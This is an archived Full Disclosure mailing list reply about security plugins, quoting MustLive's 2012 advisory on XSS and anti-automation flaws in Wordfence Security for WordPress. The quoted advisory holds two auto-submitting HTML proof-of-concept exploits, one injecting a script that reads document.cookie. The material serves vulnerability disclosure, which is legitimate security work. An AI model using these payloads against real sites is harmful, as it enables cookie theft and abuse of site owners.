Full Disclosure mailing list archives
Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress
From: Troy Rose <troyjrose () gmail com>
Date: Tue, 23 Oct 2012 16:53:42 +1100
Its a bit like having a security alarm for an open door, IMHO. On 20 October 2012 04:37, Philip Whitehouse <philip () whiuk com> wrote:
Hmm, Another 'security' plugin with vulnerabilities... What exactly is the point of them? Even in an ideal world surely WP should be secure anyway - doesn't it just increase the attack surface? Philip Whitehouse On 19 Oct 2012, at 18:16, "MustLive" <mustlive () websecurity com ua> wrote:Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. ------------------------- Affected products: ------------------------- Vulnerable are Wordfence Security 3.3.5 and previous versions. ---------- Details: ---------- XSS (WASC-08): Wordfence Security XSS.html <html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="<script>alert(document.cookie)</script>"> </form> </body> </html> Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html <html> <head> <title>Wordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="admin () e-mail com"> </form> </body> </html> I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/).Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 19)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Troy Rose (Oct 24)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Mark Maunder (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 26)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)